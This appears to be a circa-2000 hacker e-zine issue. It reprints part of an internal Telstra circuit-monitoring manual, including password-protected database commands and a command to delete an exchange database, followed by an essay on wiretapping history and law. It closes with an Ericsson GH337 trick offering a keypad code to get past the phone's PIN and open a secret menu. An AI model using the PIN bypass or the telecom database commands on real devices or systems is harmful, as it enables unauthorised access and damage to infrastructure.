Disable Printer. Used to inform the CCI that the printer is out for maintenance or faulty. The Central computer will hold all reports until the printer is enabled again. - Lamps/Buzzer. Has two functions:- Checks that all LEDs are OK. Resets acoustic alarm. 3.3 ERROR DIAGNOSTICS In addition to the error diagnostics described during powerup, the CCI continually monitors the state of the ICMMs. If they fail in any way a message is printed out informing the local staff of the type of error. Message Meaning ICMM not communicating No CCI-ICMM communication. Usually means that the ICMM is switched off or the GPIB cable is disconnected. Configured ICMM The CCI has recognised that the ICMM has powered-up or that the Central computer has re-configured the CCI and ICMMs. Failed to config ICMM The CCI has failed to find the ICMM's configurations. ICMM fail..ROM ICMM ROM in error. ICMM fail..RAM Faulty ICMM RAM ICMM fail..timer Faulty ICMM timer chip ICMM fail..GPIA ICMM GPIB chip fail ICMM fail..DMAC Direct memory access chip faulty ICMM fail..unknown Undetermined hardware fault When such errors occur, if the ICMMs involved are in the CCI Group definitions, then a status message is automatically sent to the Central computer. 3.3.1 GPIB Monitoring If an error occurs in an ICMM then the 'FAULT' LED on the CCI front panel glows. The push buttons can be used to locate where the fault occured. The 'SELECT GPIB' button is used to select one of three GPIB ports. The GPIB selected is displayed in the 7 segment LEDs - 1, 2 or 3. If the CCI detected an actual GPIB port failure in the CCI, then the letters 'HF' (hardware) or 'CF' (controller) would toggle, with the GPIB, number in the LED display. If no error is detected then only the GPIB number would be shown. The 'SELECT ICMM' button is used to select one of fourteen possible ICMMs on the previously selected GPIB. The ICMM number is shown is hexa-decimal. (Refer to Appendix B). If the selected GPIB had a hardware fault then the ICMMs are marked unequipped and the letters 'nE' would toggle with the ICMM number. If the GPIB hardware is OK, but the CCI can't talk with the ICMM, then the letters 'nC' would toggle. 3.4 LINE TESTING Local staff can monitor the state of a particular line via the front panel of the CCI. To select a line the user must select the GPIB and ICMM as described above and then select the line with the 'SELECT LINE' button. The line number is displayed in hexa-decimal. The LED above the 'SELECT LINE' button will be on when the line is seized and off when the line is idle. Holding the 'SELECT LINE' button operated will cycle very rapidly through all the lines on the ICMM. The 7 segment LEDs return to rotating state after a short interval. 4. INDIVIDUAL CIRCUIT MONITORING MODULES 4.1 GENERAL The CCI communicates with the ICMMs via 3 GPIB buses. Each GPIB supports up to 14 ICMMs, a maximum of 42 ICMMs per CCI. Each ICMM monitors a maximum of 256 lines. A CCI has a capacity of 10,752 lines. The ICM rack contains a Terminal Unit frame which has a capacity of 14 ICMMs maximum. On this basis, a CCI can support 3 ICM racks, each with a maximum of 14 ICMMs. If 2-3 racks are installed, only the first rack is equipped with a CCI. The ICMMs are numbered from right to left, looking from the front of the rack. 4.2 INSTALLATION 4.2.1 Precautions As the ICMM is a big board care must be taken when installing them in the Terminal Unit Frame. Use Anti-static precautions. Ensure the ICMM power On/Off switch (top-front of the ICMM is OFF before installing or removing. 5. SYSTEM OPERATION 5.1 LOCAL FUNCTIONS FROM PRINTER/TERMINAL 5.1.1 General Various functions can be performed by entering commands on the printer/terminal. These commands do not affect the polling between the Central Computer and the CCI. After power up the CCI is placed in the IDLE mode. This is the normal mode and the CCI must always be returned to this condition. The IDLE mode is indicated by the prompt:- IDLE > In this mode, local staff can make enquiries about the state of the system. 5.2 IDLE MODE COMMANDS 5.2.1 Listing Configurations Print all the Group Definitions stored in the CCI. Enter the command:- L 5.2.2 ICMM Status Report An ICMM status table, giving the state of the 42 ICMMs, can be printed by entering:- ICMM A detailed report on a particular ICMM can be printed with the command:- ICMM where = 1..42. eg ICMM 8 will print the status of ICMM 8 5.2.3 Central Computer Link Status The state of the communication link to the Central computer can be printed with the command:- SA 5.2.4 Central Computer Link Statistics The transmission statistics are printed with :- SS 5.2.5 Dynamic Memory Status The current state of the dynamic memory pool:- MEM 5.2.6 Time Request The current CCI time:- T 5.2.7 Poll Status The current Central polling status:- P 5.2.8 Request Group Report To obtain a listing of the groups relevant to CCI, from the Central Computer, enter:- GREP 5.2.9 Request Transaction Report Refer to 5.3.2 Transaction Mode To obtain a list of the transactions waiting for processing, enter:- TREP 5.2.10 Help To list all the commands, their format and meanings, enter:- H 5.3 SPECIAL MODE COMMANDS From the IDLE mode the CCI can be placed in other special modes. A listing of commands relevant to that mode can be obtained with the Help command. 5.3.1 Local Poll Mode This mode is used to poll a single ICMM for the pegcount/usage data, or poll a Group of lines. The mode is entered using the command:- POLL and exited with a CTRL+E. When the Poll mode is entered the prompt returned is :- POLL > 5.3.1.1 Polling An ICMM Enter the following command:- I Where icmm no. = 1..42 ref type = ACT for active register = IDL for idle register lines = 1 to 254 e.g. I 4 ACT 1 10 = ICMM 4 ACT lines 1 to 10. 5.3.1.2 Polling a Group Enter the following command:- G where local group ref is the group number register type. See 5.3.1.1. eg G 22 ACT = Group 22, Active registers. The local group reference number can be obtained by using the 'L' command in the IDLE mode. 5.3.1.3 Swapping Registers This function should not be used as it affects the data stored in the idle regs. It is pass-word protected at the Central site. 5.3.2 Transactions Mode This mode is used to update the ICM database At this stage it is not intended to be used in WA. The mode is pass-word protected. See Section 6. DATABASE MANAGEMENT for the current method of creating and updating the database. It is imperative when using Transaction Mode to be fully conversant with the database structure and to exercise extreme care. If a reasonable degree of logic is not used then the entire database for the Exchange will be corrupted. Enter the following command:- TRANS Prompt is:- password? If the password is entered correctly the returned prompt is:- TRAN > The user now has the authority to modify the ICM database for the Exchange. When all the transactions have been entered, and the mode exited with CTRL+E, they are transmitted to the Central computer and stored. The Central computer will inform the user of any errors in the transactions but not incorrect data. The next time the Central Computer updates the Group Definitions, they will be sent down to the CCI. Only a certain size buffer has been allocated for these transactions. If the buffer fills, then the message 'Buffer Full' is printed. To clear the buffer, exit the mode and then re-enter to continue with further transactions. 5.3.2.1 Content Of Transactions Transactions contain both Group and Line information. Each transaction must be prefixed with one of the following symbols :- '+' = Create/modify '-' = Delete '*' = Wildcard symbol for special use 5.3.2.2 Create/Modify a Group Before adding a Group, or adding/removing lines in a Group, the Group name must be specified, and prefixed accordingly. eg. + PRTA T PRTA-PRTH C1 5.3.2.3 Deleting a Group The Group name must be specified. eg. - PRTA T PRTA-PRTH C1 This action will remove the group name and all lines in the Group, if they exist. 5.3.2.4 Creating a Line The Group name must exist and be specified then the new Line name can be entered. + PRTA T PRTA-PRTH C1 + 102054 034 7 9B 21 The Line name format is as follows :- + Add 1 The CCI number in the Exchange 04051 The ICMM and inlet numbers (ICMM=04, I/L=051) 034 The Circuit or traffic number 7 9B 21 The suite, rack and R/S 5.3.2.5 Modifying a Line The same rules apply as for 5.3.2.4:- + PRTA T PRTA-PRTH C1 (Modify Group) - 104051 034 7 9B 21 (Delete old line) + 108088 034 5 6A 18 (Add new line) 5.3.2.6 Deleting an Exchange This transaction will delete the entire Exchange database. Use with care!! * PRTA 5.3.2.7 Editing Transactions Editing of the transactions entered can be performed before they are sent to the Central Computer. Use the command :- L The CCI will list out the transactions in the order they were entered, giving a line number for each. The line number can be used to delete, and insert new transactions within the list. To delete:- Enter D To insert:- Enter I followed the transaction. [sic - dunno] 5.3.3 Remote Terminal Mode This mode has not been implemented. It is password protected. 5.3.4 Message Mode 5.3.4.1 General This mode can be used to send messages to the Central site. The messages appear on the Central Computer VDU. Command is:- MESSAGE and the prompt returned is:- MESS > Enter your message, terminating each line with a return. Transmit the message with a double return. MESS > Hello Central site. Goodbye. CTRL+E 5.3.4.2 Editing Messages Limited facilities are provided to edit messages before transmission. To list the lines of text of the message enter:- L The CCI will print the message with line numbers. The line number can be used to delete or insert lines of text in the message. To delete a line, enter:- D To insert a line, enter:- I followed by the text. 5.3.5 Test Mode This mode can be used to observe the change of state of lines in an ICMM. As the line/s change they are printed out. eg, Line 2 On Line 8 Off Line 2 Off Line 6 On Enter the mode with the command:- TEST A prompt is returned:- TEST > Enter ICMM eg, ICMM 2 1 10 = ICMM 2 inlets 1 to 10 To stop testing, enter CTRL+E A new set of inlets can now be checked. To exit Test mode, enter CTRL+E. 5.3.6 Communications Mode This mode is used during the commissioning. 5.4 EXITING MODES When the user has finished performing functions in one of the modes previously described, the mode MUST be exited with the keys:- CTRL+E The CCI will respond with the IDLE prompt. 6. DATABASE MANAGEMENT 6.1 GENERAL POLICY All updating of the ICM Database in WA will be done by the central site staff as will be the initial loading of data for each new site. 6.2 NEW INSTALLATIONS When a new site is first equipped the Installation team will notify the central site staff of the group name information and line details by means of forms WG4372 shts 5-8. These forms, once completed will be forwarded to the central site at the following address. OIC NTMC 13th FLOOR, 639 WELLINGTON ST PERTH 6000 6.3 AMENDING EXISTING DATABASES The local exchange staff will be responsible for notifying the central site staff of any changes to their data. This is done by means of form EW325 supplied in book form from the central site. On reciept of an update advice form the central site staff will amend the data base and send a group report to the exchange (group numbering changes as additions or deletions are made to the data base). 6.4 CODING OF DATA FOR ICM Although the central site staff will check any data before entering it into the database time and effort can be reduced by coding the data in a format suitable for ICM. Appendix (A) describes the coding principles used in WA for the ICM database. Exchange staff should be aware that it can take several days to enter the changes into their database due to central site staff having to thoroughly check the data in order to avoid corruption of the database. 7. ICM REPORTS 7.1 GENERAL The ICM System gathers pegcount and usage data from all the exchanges, according to a Poll/Report schedule. The Schedule is arranged to automatically send reports at realistic times. Typically these times are set to cover busy traffic periods and a 3-4 hour poll period is usually chosen. The Report Schedule can be modified to suit the needs of an Exchange. Any of the following Report types can be generated, and sent to the Exchange. There are some limitations which will be discussed later on. 7.2 REPORT TYPES Currently, there are only four report types supplied by manufacturer of the ICM system. 7.2.1 Exception Report This is a report that highlights suspect circuits. Only those circuits, whose behaviour departs from preset thresholds, are listed. Typical thresholds and their settings are :- LOW PEGCOUNT (LP) :- Less than 1 call an hour. HIGH PEGCOUNT (HP) :- More than 50 calls an hour. LOW HOLDING (LH) :- Less than 30 sec. per call. HIGH HOLDING (HH) :- More than 3550 sec. per call. LOW USAGE (LU) :- Less than 50 sec. an hour. HIGH USAGE (HU) :- More than 3550 sec. and hour. ALWAYS IDLE (AI) :- Never seized. ALWAYS BUSY (AB) :- Permanently held. These settings can vary from Group to Group, hour by hour, and day by day, depending on the Group type and the average traffic pattern over a period of time. These thresholds will require a lot of "fine tuning" to avoid listing non-faulty circuits. An Exception Report can be generated for one or more groups in an Exchange. It is not possible to report on an individual circuit in a group. This is the most common type of report. 7.2.2 Detailed Report A Detailed report lists each circuit in a group or groups regardless of whether they are exceptions or not. Not normally sent to an Exchange due to the length of the report, but available on request. 7.2.3 Group Summary Report A Group Summary report lists all the groups in the Exchange database, with the number of circuits, the always idle, always busy, average hold time, and erlangs carried by the Group. [wtf is an erlang?] Not normally sent but available on request. 7.2.4 Crossed Leads This report compares the pegcount and usage figures of all circuits and then lists those with identical figures. It is not inferred that circuits with the same figures are necessarily crossed. If the same two circuits appear on subsequent reports then it is a fair assumption. Not run normally as it is very slow but available on request. 8. HARDWARE MAINTENANCE AND ROUTINE CHECKS 8.1 GENERAL Exchange and ICM equipment is NOT covered by a maintenance contract and all repair is a Telstra cost. No attempt must be made to repair the CCI or ICMMs. Any abnormal ICM equipment behaviour should be referred to the NTMC OIC on 08 9420 7027. The NTMC OIC will determine the appropriate action to be taken. 8.2 PROVEN FAULTY EQUIPMENT 8.2.1 ICMM Any proven faulty ICMM should be replaced with a spare board ordered from the Central Parts Store. The OIC NTMC will authorise the dispatch of a replacement board and the return of the faulty board to the Central Parts Store. The Exchange will arrange the transport of a faulty item by a suitable carrier. 8.2.2 CCI The OIC NTMC will arrange for the dispatch of a spare CCI from the Central Parts Store as for faulty ICMM boards. 8.2.3 PRINTER The printer is maintained by the Business Network Branch and all faults should be reported to 1107. The supply of paper and ribbons is the responsibility of the Exchange. 8.3 ALARMS The ICM internal alarms have not been connected to the main Exchange alarms due to lack of software details. 8.4 ROUTINE CHECKS The CCI and printer should be checked regularly (daily). 8.4.1 CCI Ensure that the following LEDs on the front panel are on:- The 2.7 segment display is slowly rotating. Printer ON-LINE Modem (except RI) GPIB POLLING (flickering) 8.4.2 ICMM Check that there are no alarm LEDs on. 8.4.3 PRINTER Check that the printer is on LINE In IDLE mode. Has plenty of paper. 9. FAULT FINDING (Using ICM Reports and Local Functions) 9.1 GENERAL The ICM system does not find or localise faults. It can only highlight possible faulty circuits. Due to the averaging technique used, the thresholds set for each group of lines, by the Central site, and the need for a very accurate database, the first occurrence of a faulty line in a report should not be of great concern. When a circuit starts to appear regularly, then it is time to act. Generally, the longer the Poll period the better. This enables the system to gather more data and provide much bigger samples. 9.2 FAULT TYPES 9.2.1 ALWAYS IDLE Any circuit consistently indicating AI could be in one of the following conditions :- Incoming Circuit - Blocked at distant end. - Blocked at I/C relayset - Relayset (either end) unplugged or not equipped - Bearer fault - New circuit (in database but not in service) - Old circuit (not in service but in database) - Being seized for less than 2 seconds - Database incorrect - Wiring to ICMM incorrect Outgoing Circuit - The above - GV grading fault 9.2.2 ALWAYS BUSY - Not releasing - Data circuit that has not been released - Bearer fault 9.2.3 HIGH PEGCOUNT, LOW HOLDING (HP and LH) Depending on the average hold-time, the circuit may be suffering from one of the following symptoms :- - Very low holding. Noisy bearer - Approx 7-10 seconds. MFC failure - Approx 90 seconds. Timing out due to no answer - Between 90 seconds. Timing out due to no answer - Between 30-60 seconds. Call to Service Operator - Approx 10-20 seconds. TRT running 9.2.4 LOW PEGCOUNT, HIGH HOLDING (LP and HH) - Not releasing properly, waiting until forced - Non STD route - One or more very long calls in the Poll period 9.2.5 LOW PEGCOUNT, NORMAL HOLDING - Out of traffic for part of Poll Period - Grading anomaly (if Crossbar) - Late choice SxS circuit 9.2.6 HIGH PEGCOUNT, NORMAL HOLDING - Grading anomaly (if crossbar) - Early choice SxS circuit APPENDIX A 1. CODING OF DATA FOR ICM 1.1 INTRODUCTION This section describes the coding principles used to enter data into the WA ICM data base. Information is entered onto a series of forms (WG 4372 shts 5 to 8) by the installation team or forms EW325 by operations staff. These forms are then forwarded to the Central Site staff for uploading into the ICM database. GROUP DEFINITIONS Each group definition in ICM consists or a Group Name. Threshold, Line Configuration, Inlet and Line Name. The installer need only fill in the details for the group line and group name as listed under the heading DEVICE on WG 4372. The other details will be coded by the central site staff. 1.3 GROUP NAME The following syntax has been adopted for creating group names in ICM. character character character character character group 1 group 2 group 3 group 4 group 5 AAAA B CCCC-DDDD EEEE Character Group 1 -- (AAAA) -- 4 alpha -- ICM monitoring point. Location name code normally the LRD or MJR code for the station. Character Group 2 -- (B) -- 1 alpha -- Group type Normally "T" for a traffic circuit or "S" for a statmeter or common control. Character Group 3 -- (CCCC) -- 4 alphanumeric -- Originating/ control station or Common Control 1. Character Group 4 -- (DDDD) -- 4 alphanumeric -- Terminating/Non Control station or Common Control 2. Character Group 5 -- (EEEE) -- 4 alphanumeric -- Route or Common Control designation. The coding of traffic groups (ie, where Character Group 2 = T) is fairly straight forward. eg. Where the traffic group is between Katanning ARM (KATA) and Bunbury ARM (BBRA) and the monitoring is being carried out at Katanning the coding would be KATA T KATA-BBRA M1 Permissable values for Character Group 5 when a traffic circuit is being monitored are as follows (n = The number of the group, * = space.) Fn** ARF terminating Cn** 10C terminating Mn** ARM terminating KN** ARK terminating ZnI* Bothway circuit incoming ZnU* Bothway circuit outgoing Qn** Queue position Xn** PABX circuit Pn** SPC terminating Sn** Entraide junctions All definitions are available from LRD (Country) or MJR (Metro). 1.3 THRESHOLD The threshold is a number which indicates the threshold table to be used in the ICM system. In WA this is normally set to 00. 1.4 LINE CONFIGURATION The Line Configuration field is used to set the parameters that the ICM will monitor. In WA this is usually set to LE256 for a traffic group and LE005 for a common control group. The first character (L) indicates that we are monitoring the Leading edge of the transition, the second character (E) indicates that the pulse should be an Earth pulse and the 3 digit number is the timer in milliseconds that the change of state needs to exist to be recognised as an event. 1.5 INLET The ICM Inlet field is made up of: The Exchange Name -- 4 alpha -- (LRD code for the Exchange) The CCI Number -- 1 numeric -- in the range 1 to 3 The ICMM Number -- 2 numeric -- in the range 1 to 42 The Line Number -- 3 numeric -- in the range 1 to 256 1.6 LINE NAME The line name consists of up to 25 characters the first 3 of which must be numeric. This field is usually set out in the following manner. For traffic groups. Circuit or trunk number -- 3 numeric Suite or route number -- 3 numeric or 4 alphanumeric for 10C Rack -- 3 numeric or I/U for 10C Position or junctor -- 3 numeric or 4 Hex address for 10C In the case of outgoing circuits from PRTA only the Route Number is added to the end of this field in the manner VRnnn. the overall line entry for the previous example in sect 4.3 might look like this; KATA T KATA-BBRA M1 00 LE256 KATA 1 20 120 001 05A 004 021 A similar example for a 10C circuit might look like this; PRTH T PRTH-BBRA M1 00 LE256 PRTH 1 25 123 001 R036 U 0AB4 1.7 CODING OF COMMON CONTROL MONITORING POINTS When the points being monitored are not traffic groups but are leads from the common control equipment, the coding for the data base becomes somewhat different. Chracter groups 3 and 4 will now represent the item of equipment being monitored. Permissable values and their meanings are listed below. (n = numeric character, * = space, # = alpha character .) character character equipment group group 3 4 GVn* KMRn GVM 1/80 GV MARKER GVn* XY** GVM 2/160 GV MARKER H4** REGn REG-H4 #H4* GUXY REG-H4-XY #SS** LPnn SS 16/40 #REG* LPnn REG-LP / REG-E-LP #AN** KSnn AN-KS PT 1 #AN** REGn AN-REG PT 1 #KS** LPnn KS #DS** **** DS #RSI* LPnn RSM Common Control Equipt in MSE's M*** **** MARKER VM** **** ROUTE MARKER KSR* **** CODE SENDER AN** **** ANALYSER RSI* Y1** or Y2** REGISTER FINDER MARKER RA** **** REGISTER ANALYSER MARKER SSAB **** SENDER FINDER (SSA/B) REG* Y1nn REGISTER Y1 REG* Y2nn REGISTER EH2Y2 RTC* **** ROUTE TIME CONGESTION LEAD Common Control Equipment in ARM's In all cases of common control equipment coding the next field, character group 5 is used to describe the lead being monitored, EG TKM1,SM2,DL.ETC. The Circuit or trunk number column in the line name field is used to indicate the number of the item of equipment. No other columns are required for common control coding. A group name entry for the second Register Y1 in an ARM then may be coded as follows; PRTA S REG - Y1 TKM5 002. [EOF - Marlinspike 4/5/00 - World Ends Tommorrow!] ........[ A look into wiretapping ]...................[ psyops ]............ Wiretapping is the traditional term for interception of telephone conver- sations. This should not be taken too literally. The word is no longer restricted to communications traveling by wire, and contemporary wire- taps are more commonly placed on radio links or inside telephone offices. The meaning has also broadened in that the thing being tapped need no longer be a telephone call in the classic sense; it may be some oher form of electronic communication, such as fax or data. Compared with the more precise but more general phrase "commu- nications interception," the word "wiretapping" has two connotations. Much the stronger of these is that a wiretap is aimed at a particular target, in sharp contrast to the "vacuum cleaner" interception widely practiced by national intelligence agencies. The weaker connotation is that it is being done by the police. The history of wiretapping in the United States is in fact two histories intertwined. It is a history of wiretapping per se--that is, a history of the installation and use of wiretaps by police, intelligence agencies, hones citizens, businesses, and criminals. It is also a history of society's legal response to wiretapping by these various groups. The origins of wiretapping lie in two quiet different practices: eaves- dropping and letter opening. "Eavesdropping," although once more re- stricted in meaning, has come to describe any attempt to overhear con- versations without the knowledge of the participants. "Letter opening" takes in all acquisition, opening reading, and copying of written mes- sages, also without knowledge of the sending and receiving parties. Telecommunication has unified and systematized these practices. Before the electronic era, a conversation could only be carried on by people located within earshot of each other, typically a few feet apart. Neither advanced planning nor great effort on the part of the participans was required to ensure a high degree of security. Written communica- tions were more vulnerable, but intercepting one was still a hit-or-miss affair. Messages traveled by a variety of postal services, couriers, travel- ers, and merchants. Politically sensitive messages, in particular, could not be counted on to go by predictable channels, so special couriers were sometimes employed. And written messages enjoyed another sort of protection. Regardless of a spy's skill with flaps and seals, there was no guarantee that, if a letter was intercepted, opened, and read, the victim would not notice the intrusion. Since spying typically has to be done covertly in order to succeed, the chance of detection is a substantial deterrent. Electronic communication has changed all this in three fundamental ways: it has made telecommunication too convenient to avoid; it has, despite appearances, reduced the diversity of channels by which written messages once traveled; and it has made the act of interception invisible to the target. Conversation by telephone has achieved an almost equal footing with face-to-face conversation. It is impossible today to run a successful busi- ness without the telephone, and eccentric even to attempt to do without the telephone in private life. The telephone provides a means of commu- nication so effective and convenient that even people who are aware of the danger of being overheard routinely put aside their caution and use it to convey sensitive information. As the number of channels of communication has increased (there are now hundres of communication companies, with myriad fibers, satel- lites, and microwave links), the diversity of communication paths has diminished. In the days of oxcart and sail, there was no registry of the thousands of people willing to carry a message in return for a tip from the recipient. Today, telecommunications carriers must be registered with national and local regulatory bodies and are well known to trace associ- ations and industry watch groups. Thus, interception has become more systematic. Spies, no longer faced with a patchwork of ad hoc couriers, know better where to look for what thet seek. Perhaps more important, interception of telecommunications leaves no telltale "marks on the envelop." It is inherent in telecommunication-- and inseparable from its virtues--that the sender and the receiver of a message have no way of telling who else may have recorded a copy. Any discussion of wiretapping, particularly a legal discussion, is com- plicated by the fact that electronics has not only made interception of telecommunications possible; it has also made it easier to "bug" face-to- face conversations. Bugging would be nearly irrelevant to the central sub- ject of this document--Taking A Deeper Trip Into Wiretapping--were it not for the fact that bugs and wiretaps are inseparably intertwined in law and jurisprudence and named by one collective term: electronic surveillance. Wiretaps and bugs are powerful investigative tools. They allow the eavesdropper to overhear conversations between politicians, criminals, lawyers, or lovers without the targets' knowing that their words are being share with unwanted listeners. Electronic surveillance is a tool that can detect criminal conspiracies and provide prosecutors with strong evidence--the conspirators' incriminating statements in their own voices --all without danger to law-enforcement officers. On the other hand, the very invisibility on which electronic surveillance depends for its effective- ness makes it evasive of oversight and readily adaptable to malign uses. Electronic surveillance can be and has been used by those in power to undermine the democratic process by spying on their political opponents. In light of this, it is not surprising that Congress and the courts have approached wiretapping and bugging with suspicion. Today, communication enjoys a measure of protection under US law, and neither government agents nor private citizens are permitted to wire- tap at will. This has not always been the case. The current view--that wiretaps are a kind of search--has evolved by fits and starts over a cen- tury and a half. The Supreme Court ruled in 1967 that the police may not employ wiretaps without court authorization. Congress has embraced this principle, limiting police use of wiretaps and setting standards for the granting of warrants. The same laws prohibit most wiretapping by private citizens. The rules against unwarranted wiretapping are not absolute, however. For example, the courts ruled in 1992 (United States vs. David Lee Smith, 978 F. 2nd 171, US App) that conversations over cordless phones were not protected and that police tapping of cordless phones did not require a search warrant. A 1994 statute (Communications Assistance for Law En- forcement Act of 1994, Public Law 103-414, �202) extended the warrant requirements of the earlier law to cover cordless phones. The law also makes some exceptions for businesses intercepting the communications of their own employees on company property. Contact. I don't like to be contacted with subjects like "I think your article sucks," but since you can't make everyone happy, I must learn to live with it. For the ones with a positive attitude, you can e-mail me at psyops@evidence2k.de with all questions security-related. ........[ Ericsson GH337 ].............................[ Pottsy ]............ Pin Codes: Breaking the PIN CODE on 337 phones is simple, ... when asked to enter pincode , cain in **04*0000*0000*0000# that should get thru... ive tried this on models gh337 and 338, I assume that other models may also have this exploit... GH337 tricks: The Secret Menu Key : < Left Arrow > Right Arrow C CLR To access the secret Menu, from the main screen type >*<<*<* You will be presented with the software release information.. use the <, >, arrows to scroll the through the menu.. the menu options: FLASH - This reboots the Phone and resets the welcome message... doesnt seem to reset anything else.. could have something to do with Flash Memory.. TEXT CHECK - Once going into this option, pressing any key will scroll through all the messages your 337 displays.. eg. `read mail?' or `phone book' any text that is programmed into the phone, exluding shit u put in there yourself.. eg phone numbers etc.. im still trying to figure out a way to change these messages but no luck yet.. in my next file if i figure it out and its possible ill document it.. INIT EEPROM - (EEPROM), for those who dont know, stands for [Electrically Erasable Programmable Read-Only Memory]... This option restarts the phones software.. Shortcut: 0 followed by # will bring up the LAST CALL message, and the phone number you last called, or who called you. If you have any info that isnt in this guide please contact me : pottsy15@hotmail.com .................................[ outro ].................................. This section doesnt actually do anything. Its just another thing I can put my name on in the TOC so it looks like I do something around here. .eof.